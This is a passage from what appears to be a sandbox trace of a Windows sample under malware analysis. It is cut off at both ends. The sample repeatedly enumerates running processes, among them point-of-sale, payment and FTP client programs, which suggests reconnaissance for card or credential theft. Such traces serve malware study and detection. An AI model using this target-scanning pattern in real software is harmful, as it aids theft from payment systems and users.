[0245.242] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0245.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0245.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0245.251] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0245.253] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0245.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0245.256] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0245.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0245.259] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0245.340] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0245.341] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0245.343] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0245.344] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0245.346] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0245.348] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0245.349] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0245.351] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0245.352] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0245.377] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0245.379] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0245.381] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.383] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.384] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.388] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0245.389] CloseHandle (hObject=0x1018) returned 1 [0245.389] Sleep (dwMilliseconds=0x64) [0245.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0245.525] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.529] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.530] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.532] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.533] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.535] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.536] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.537] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.539] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.540] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.542] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.545] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.546] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.548] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.549] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.550] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.552] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.553] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.555] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.556] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.563] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0245.564] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0245.566] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.567] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.569] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0245.570] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0245.572] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0245.575] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0245.576] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.577] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.579] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.580] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.581] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.583] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0245.584] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0245.586] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0245.587] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0245.590] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0245.592] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0245.593] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0245.594] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0245.596] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0245.597] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0245.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0245.600] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0245.601] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0245.602] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0245.604] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0245.655] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0245.656] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0245.658] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0245.659] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0245.660] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0245.662] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0245.663] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0245.665] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0245.666] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0245.668] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0245.671] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0245.673] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, 